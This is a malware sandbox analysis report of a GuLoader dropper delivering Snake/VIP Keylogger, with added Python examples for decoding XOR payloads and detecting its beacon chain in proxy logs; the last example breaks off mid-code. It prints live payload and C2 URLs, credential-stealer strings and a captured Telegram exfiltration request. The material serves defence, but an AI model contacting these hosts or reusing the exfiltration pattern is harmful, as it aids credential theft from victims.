Windows Analysis Report
MC8017774DOCS.exe

Overview

General Information

Sample name: MC8017774DOCS.exe
Analysis ID: 1562048
MD5: d4c19e96d83bd586016a3be2e3a57f1d
SHA1: bf5d7271766db9b568ac98006c7eda0de40bc2bd
SHA256: 5cba2773587387ad35e187bf5135467da368909ae0d4dd1a0f1d80be6338fc44
Tags: exe, GuLoader, user-abuse_ch

Detection

GuLoader, Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Machine Learning detection for sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Process Tree

  • System is w10x64
  • MC8017774DOCS.exe (PID: 7084, cmdline: "C:\Users\user\Desktop\MC8017774DOCS.exe", MD5: D4C19E96D83BD586016A3BE2E3A57F1D)
    • MC8017774DOCS.exe (PID: 4488, cmdline: "C:\Users\user\Desktop\MC8017774DOCS.exe", MD5: D4C19E96D83BD586016A3BE2E3A57F1D)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keystrokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
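The Malpedia entry above says only that the payload GuLoader fetches is XOR-encoded. The block below is an added example written for this page, not code from the report or from any of the families named here. It shows the generic known-plaintext approach to recovering a repeating XOR key from such a download: the fixed bytes of a PE's MZ header and Microsoft DOS stub are used as known plaintext, and the decoded buffer is accepted only if a PE signature turns up at e_lfanew. GuLoader's real key handling is not described on this page and this example does not claim to reproduce it; the "downloaded" sample is constructed inline, the key-length cap of 64 and the assumption of a Microsoft-linker DOS stub are both assumptions.

```python
# Standard MZ header and DOS stub emitted by the Microsoft linker; a PE built
# with it carries these bytes at fixed offsets, which gives us known plaintext.
# (Assumption: other toolchains emit slightly different stubs.)
KNOWN_PLAINTEXT = {
    0x00: b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00",
    0x40: (b"\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21"
           b"This program cannot be run in DOS mode.\r\r\n$"),
}


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; applying it twice with the same key is the identity."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def _key_for_length(blob: bytes, klen: int):
    """Derive a key of length klen from the known-plaintext offsets, or None on conflict."""
    key = [None] * klen
    for off, plain in KNOWN_PLAINTEXT.items():
        for j, p in enumerate(plain):
            idx = off + j
            if idx >= len(blob):
                return None                  # blob too short to contain the stub
            kb = blob[idx] ^ p
            slot = idx % klen
            if key[slot] is None:
                key[slot] = kb
            elif key[slot] != kb:
                return None                  # same key slot, two different values
    if None in key:
        return None                          # some key byte was never constrained
    return bytes(key)


def recover_xor_key(blob: bytes, max_len: int = 64):
    """Shortest repeating key (1..max_len) consistent with every known byte, else None."""
    for klen in range(1, max_len + 1):
        key = _key_for_length(blob, klen)
        if key is not None:
            return key
    return None


def looks_like_pe(data: bytes) -> bool:
    """MZ magic plus a PE signature at the offset stored in e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def decode_downloaded_payload(blob: bytes):
    """(key, decoded PE) for an XOR-encoded download; (key, None) if the decode is
    not a PE; (None, None) if no consistent key was found."""
    key = recover_xor_key(blob)
    if key is None:
        return None, None
    plain = xor_bytes(blob, key)
    return (key, plain) if looks_like_pe(plain) else (key, None)


def build_sample_pe_prefix(size: int = 0x200) -> bytes:
    """Constructed stand-in for a downloaded PE (not a real binary): MZ header,
    DOS stub and a PE signature at e_lfanew = 0x80, followed by filler bytes."""
    buf = bytearray(size)
    buf[0x00:0x10] = KNOWN_PLAINTEXT[0x00]
    buf[0x3C:0x40] = (0x80).to_bytes(4, "little")
    stub = KNOWN_PLAINTEXT[0x40]
    buf[0x40:0x40 + len(stub)] = stub
    buf[0x80:0x84] = b"PE\x00\x00"
    for i in range(0x84, size):
        buf[i] = (i * 7) & 0xFF
    return bytes(buf)


if __name__ == "__main__":
    # Demo: encode the constructed PE with a 23-byte key and recover it blind.
    demo_key = bytes(range(0x11, 0x11 + 23))
    encoded = xor_bytes(build_sample_pe_prefix(), demo_key)
    key, pe = decode_downloaded_payload(encoded)
    print("recovered key:", key.hex() if key else None, "PE:", pe is not None)
```

The recovery only works when the known bytes cover every key position, so with this stub it handles keys up to 57 bytes; a download whose first bytes are not a PE (shellcode, or a stage with a custom header) yields (None, None) rather than a wrong key, which is the failure mode to watch for when the sandbox's `.bin` turns out not to be the final PE.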
No configs have been found
Yara matches on memory dumps (25 entries in the full report; first five shown)

Source | Rule | Description | Author
00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  Matched strings:
  • 0x35581: $a1: get_encryptedPassword
  • 0x35555: $a2: get_encryptedUsername
  • 0x35619: $a3: get_timePasswordChanged
  • 0x35531: $a4: get_passwordField
  • 0x35597: $a5: set_encryptedPassword
  • 0x35364: $a7: get_logins
  • 0x30bfc: $a10: KeyLoggerEventArgs
  • 0x30bcb: $a11: KeyLoggerEventArgsEventHandler
  • 0x35438: $a13: _encryptedPassword
00000000.00000002.2522145206.0000000000848000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_GuLoader_3 | Yara detected GuLoader | Joe Security
Yara matches on unpacked PEs (60 entries in the full report; first five shown)

Source | Rule | Description | Author
4.2.MC8017774DOCS.exe.360e0f20.2.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
4.2.MC8017774DOCS.exe.360e0f20.2.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
4.2.MC8017774DOCS.exe.360e0f20.2.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
                    No Sigma rule has matched
Suricata IDS alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-25T07:09:59.525079+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49821 | 172.67.177.134 | 443 | TCP
2024-11-25T07:10:06.599757+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49838 | 172.67.177.134 | 443 | TCP
2024-11-25T07:10:18.087506+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49871 | 172.67.177.134 | 443 | TCP
2024-11-25T07:10:21.452984+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49882 | 172.67.177.134 | 443 | TCP
2024-11-25T07:10:24.723371+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49890 | 172.67.177.134 | 443 | TCP
2024-11-25T07:10:28.422026+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49902 | 172.67.177.134 | 443 | TCP
2024-11-25T07:09:55.095980+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49808 | 132.226.8.169 | 80 | TCP
2024-11-25T07:09:57.783587+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49808 | 132.226.8.169 | 80 | TCP
2024-11-25T07:10:04.799293+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49826 | 132.226.8.169 | 80 | TCP
2024-11-25T07:09:51.498327+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49801 | 185.244.144.68 | 80 | TCP


                    AV Detection

Source: MC8017774DOCS.exe | ReversingLabs: Detection: 42%
Source: MC8017774DOCS.exe | Virustotal: Detection: 48%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: MC8017774DOCS.exe | Joe Sandbox ML: detected

                    Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org

Static PE information
Source: MC8017774DOCS.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: MC8017774DOCS.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

HTTPS traffic (TLS versions)
Source: unknown | HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.6:49815 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49907 version: TLS 1.2

Debug symbol paths
Source: Binary string: mshtml.pdb | source: MC8017774DOCS.exe, 00000004.00000001.2521521176.0000000000649000.00000020.00000001.01000000.00000006.sdmp
Source: Binary string: _.pdb | source: MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: mshtml.pdbUGP | source: MC8017774DOCS.exe, 00000004.00000001.2521521176.0000000000649000.00000020.00000001.01000000.00000006.sdmp

File enumeration functions
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Code function: 0_2_004065DA FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Code function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Code function: 0_2_00402868 FindFirstFileW

                    Networking

Source: unknown | DNS query: name: api.telegram.org
Source: Yara match | File source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 | Host: reallyfreegeoip.org (9 requests observed, 3 of them with Connection: Keep-Alive; no User-Agent header)
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506013%0D%0ADate%20and%20Time:%2026/11/2024%20/%2015:27:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20506013%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /den/P4.php HTTP/1.1 | Content-Type: text/plain; charset=utf-8 | Host: the.drillmmcsnk.top | Content-Length: 1432 | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 132.226.8.169
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 185.244.144.68
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49801 -> 185.244.144.68:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49808 -> 132.226.8.169:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49826 -> 132.226.8.169:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49838 -> 172.67.177.134:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49821 -> 172.67.177.134:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49890 -> 172.67.177.134:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49902 -> 172.67.177.134:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49871 -> 172.67.177.134:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49882 -> 172.67.177.134:443
Source: global traffic | HTTP traffic detected: GET /pqvBgXvmocLIihvW108.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: mertvinc.com.tr | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org (10 requests observed, 7 of them with Connection: Keep-Alive)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (5 occurrences)
Source: global traffic | DNS traffic detected: DNS query: mertvinc.com.tr
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: global traffic | DNS traffic detected: DNS query: the.drillmmcsnk.top
Source: unknown | HTTP traffic detected: POST /den/P4.php HTTP/1.1 | Content-Type: text/plain; charset=utf-8 | Host: the.drillmmcsnk.top | Content-Length: 1432 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Mon, 25 Nov 2024 06:10:30 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
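The request chain recorded above (checkip.dyndns.org fetched with a fixed Internet Explorer 6 User-Agent, then reallyfreegeoip.org/xml/<public ip> with no User-Agent, then a Telegram Bot API sendMessage whose text carries the host name, a timestamp and the country) is the part of this sample's behaviour that is most useful to hunt for in proxy logs. The block below is an added example written for this page, not code from the report: it classifies proxy log entries into those three stages, raises one alert per source host when the chain is present, and decodes the `text=` parameter of the Telegram request into fields. The log lines are constructed to mirror the requests above (the log format, the field order and the second, benign host are assumptions), and `sendDocument` is included in the Telegram path check as an assumption about the same API, not something observed in this analysis.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed proxy log lines (not taken from the report) in an assumed format:
#   timestamp src_ip method host path "user-agent"   ("-" when no UA was sent)
# Hosts, paths and User-Agent strings mirror the requests the sandbox recorded;
# 192.168.2.7 is an added benign host that only hits checkip.dyndns.org from a browser.
SAMPLE_LOG = """\
2024-11-25T07:09:51 192.168.2.6 GET mertvinc.com.tr /pqvBgXvmocLIihvW108.bin "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
2024-11-25T07:09:55 192.168.2.6 GET checkip.dyndns.org / "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"
2024-11-25T07:09:59 192.168.2.6 GET reallyfreegeoip.org /xml/8.46.123.75 "-"
2024-11-25T07:10:28 192.168.2.6 GET api.telegram.org /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506013%0D%0ADate%20and%20Time:%2026/11/2024%20/%2015:27:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20506013%20Clicked%20on%20the%20File%20%5D "-"
2024-11-25T07:10:30 192.168.2.6 POST the.drillmmcsnk.top /den/P4.php "-"
2024-11-25T07:11:02 192.168.2.7 GET checkip.dyndns.org / "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
"""

LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\S+) "([^"]*)"$')

# Exact User-Agent prefix the sample sent to checkip.dyndns.org (from the report).
LEGACY_UA_PREFIX = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2;"
# Bot API path is /bot<token>/<method>; the token is empty in the captured request.
# sendDocument is an assumption about the same API, not observed here.
TELEGRAM_BOT_RE = re.compile(r"^/bot[^/]*/(sendMessage|sendDocument)$")


def classify_request(host: str, path: str, ua: str):
    """Map one request to a stage of the observed beacon chain, or None."""
    p = urlsplit(path).path
    if host == "checkip.dyndns.org" and ua.startswith(LEGACY_UA_PREFIX):
        return "ipcheck"
    if host == "reallyfreegeoip.org" and p.startswith("/xml/"):
        return "geoip"
    if host == "api.telegram.org" and TELEGRAM_BOT_RE.match(p):
        return "telegram"
    return None


def decode_telegram_text(path: str) -> dict:
    """Decode the text= parameter of a sendMessage request into 'Key: value' fields.
    The bracketed trailer the sample appends is not a field and is skipped."""
    query = parse_qs(urlsplit(path).query, keep_blank_values=True)
    text = query.get("text", [""])[0]
    fields = {}
    for line in text.split("\r\n"):
        line = line.strip()
        if ":" in line and not line.startswith("["):
            key, value = line.split(":", 1)
            fields[key.strip()] = value.strip()
    return fields


def detect_chains(log_text: str) -> list:
    """One alert per source host that reached the Telegram stage or at least two stages."""
    stages_by_src, exfil_by_src = {}, {}
    for raw in log_text.splitlines():
        m = LOG_RE.match(raw)
        if not m:
            continue                     # unparseable line: skip rather than crash the hunt
        _ts, src, _method, host, path, ua = m.groups()
        stage = classify_request(host, path, ua)
        if stage is None:
            continue
        seq = stages_by_src.setdefault(src, [])
        if stage not in seq:
            seq.append(stage)            # keep first-seen order of stages
        if stage == "telegram":
            exfil_by_src[src] = decode_telegram_text(path)
    alerts = []
    for src, seq in stages_by_src.items():
        if "telegram" in seq or len(seq) >= 2:
            alerts.append({"src": src, "stages": seq, "exfil": exfil_by_src.get(src)})
    return alerts


if __name__ == "__main__":
    for alert in detect_chains(SAMPLE_LOG):
        print(alert["src"], alert["stages"], alert["exfil"])
```

The ipcheck stage is keyed on the User-Agent rather than the host alone because checkip.dyndns.org is also queried by legitimate software; the geoip and Telegram stages are rare enough on a corporate proxy to stand on their own, and requiring two stages keeps a single stray lookup from paging anyone. In a real capture the `/bot<token>/` segment will carry the operator's bot token, which is a credential worth recording from the alert.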
Strings found in binary or memory. Except for the static file entry, every source is a memory dump of MC8017774DOCS.exe, labelled here as follows:
  R1 = 00000004.00000002.3476754356.0000000033F79000.00000004.00000800.00020000.00000000.sdmp
  R2 = 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp
  R3 = 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp
  R4 = 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp
  R5 = 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp
  R6 = 00000004.00000002.3476754356.0000000033D31000.00000004.00000800.00020000.00000000.sdmp
  R7 = 00000004.00000002.3453102350.0000000003D73000.00000004.00000020.00020000.00000000.sdmp
  R8 = 00000004.00000002.3453633751.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp
  R9 = 00000004.00000001.2521521176.0000000000649000.00000020.00000001.01000000.00000006.sdmp
  R10 = 00000004.00000001.2521521176.00000000005F2000.00000020.00000001.01000000.00000006.sdmp
  R11 = 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp
  R12 = 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmp
  R13 = 00000004.00000002.3476754356.0000000033E15000.00000004.00000800.00020000.00000000.sdmp
  R14 = 00000004.00000002.3476754356.0000000033F1D000.00000004.00000800.00020000.00000000.sdmp
  R15 = 00000004.00000002.3476754356.0000000033EF1000.00000004.00000800.00020000.00000000.sdmp
  R16 = 00000004.00000002.3476754356.0000000033F18000.00000004.00000800.00020000.00000000.sdmp
  R17 = 00000004.00000002.3476754356.0000000033DED000.00000004.00000800.00020000.00000000.sdmp
  R18 = 00000004.00000002.3476754356.0000000033D7D000.00000004.00000800.00020000.00000000.sdmp
  R19 = 00000004.00000002.3476754356.0000000033DA8000.00000004.00000800.00020000.00000000.sdmp

String found in binary or memory | Found in
http://51.38.247.67:8081/_send_.php?L | R1
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded | R2, R3, R4, R5
http://aborters.duckdns.org:8081 | R2, R3, R4, R6, R5
http://anotherarmy.dns.army:8081 | R2, R3, R4, R6, R5
http://checkip.dyndns.org | R6
http://checkip.dyndns.org/ | R6
http://checkip.dyndns.org/q | R2, R3, R4, R5
http://mertvinc.com.tr/pqvBgXvmocLIihvW108.bin | R7, R8
http://mertvinc.com.tr/pqvBgXvmocLIihvW108.binW | R7
http://nsis.sf.net/NSIS_ErrorError | MC8017774DOCS.exe (static file)
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | R6
http://the.drillmmcsnk.top | R1
http://the.drillmmcsnk.top/den/P4.php | R1
http://the.drillmmcsnk.top/den/api.php | R2, R3, R4, R6, R5
http://varders.kozow.com:8081 | R2, R3, R4, R6, R5
http://www.ftp.ftp://ftp.gopher. | R9
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd | R10
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd | R10
https://ac.ecosia.org/autocomplete?q= | R11, R12
https://api.telegram.org | R13
https://api.telegram.org/bot | R2, R3, R13, R4, R5
https://api.telegram.org/bot/sendMessage?chat_id=&text= | R13
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506013%0D%0ADate%20a | R13
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | R11, R12
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | R11, R12
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | R11, R12
https://chrome.google.com/webstore?hl=en | R14, R15
https://chrome.google.com/webstore?hl=enH | R16, R15
https://duckduckgo.com/ac/?q= | R11, R12
https://duckduckgo.com/chrome_newtab | R11, R12
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | R11, R12
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 | R9
https://reallyfreegeoip.org | R17, R18
https://reallyfreegeoip.org/xml/ | R2, R3, R4, R18, R5
https://reallyfreegeoip.org/xml/8.46.123.75 | R18
https://reallyfreegeoip.org/xml/8.46.123.75$ | R19, R13, R17
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F4E000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                    Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/H
                    Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49821
                    Source: unknown | Network traffic detected: HTTP traffic on port 49890 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49852
                    Source: unknown | Network traffic detected: HTTP traffic on port 49838 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49862
                    Source: unknown | Network traffic detected: HTTP traffic on port 49862 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49871
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49882
                    Source: unknown | Network traffic detected: HTTP traffic on port 49821 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49815 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49890
                    Source: unknown | Network traffic detected: HTTP traffic on port 49871 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49852 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49907
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49838
                    Source: unknown | Network traffic detected: HTTP traffic on port 49882 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49907 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49815
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49902
                    Source: unknown | Network traffic detected: HTTP traffic on port 49902 -> 443
                    Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49907 version: TLS 1.2
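The rows above show the payload resolving its own public address through reallyfreegeoip.org (https://reallyfreegeoip.org/xml/8.46.123.75) and then opening a TLS 1.2 session to 149.154.167.220, which falls in Telegram's address range (the report summary flags Telegram API use). What follows is an added example, not part of the Joe Sandbox report: a Python detection that runs over proxy log lines and flags a host that performs an external-IP lookup and then calls the Telegram Bot API within a short window. The log format, host names and bot tokens are constructed for the example; treating api.telegram.org/bot<token>/send* as the C2 channel, and the geo-IP services listed beyond reallyfreegeoip.org, are assumptions.

```python
"""Flag hosts that look up their public IP and then talk to the Telegram Bot API.

Added example (not part of the Joe Sandbox report): the report shows the payload
fetching https://reallyfreegeoip.org/xml/<ip> and then opening TLS to a Telegram
address, the "geolocate, then exfiltrate" sequence typical of Snake Keylogger.
Log format, host names and tokens below are constructed for this example.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import List, NamedTuple, Tuple


class Event(NamedTuple):
    ts: datetime
    host: str
    method: str
    url: str


# Constructed proxy log: "<ISO-8601 UTC timestamp> <client> <method> <URL>".
# The bot tokens are fake; the 8.46.123.75 address is the one the report shows.
SAMPLE_PROXY_LOG = """\
2024-11-25T10:01:02Z WKS-17 GET https://reallyfreegeoip.org/xml/8.46.123.75
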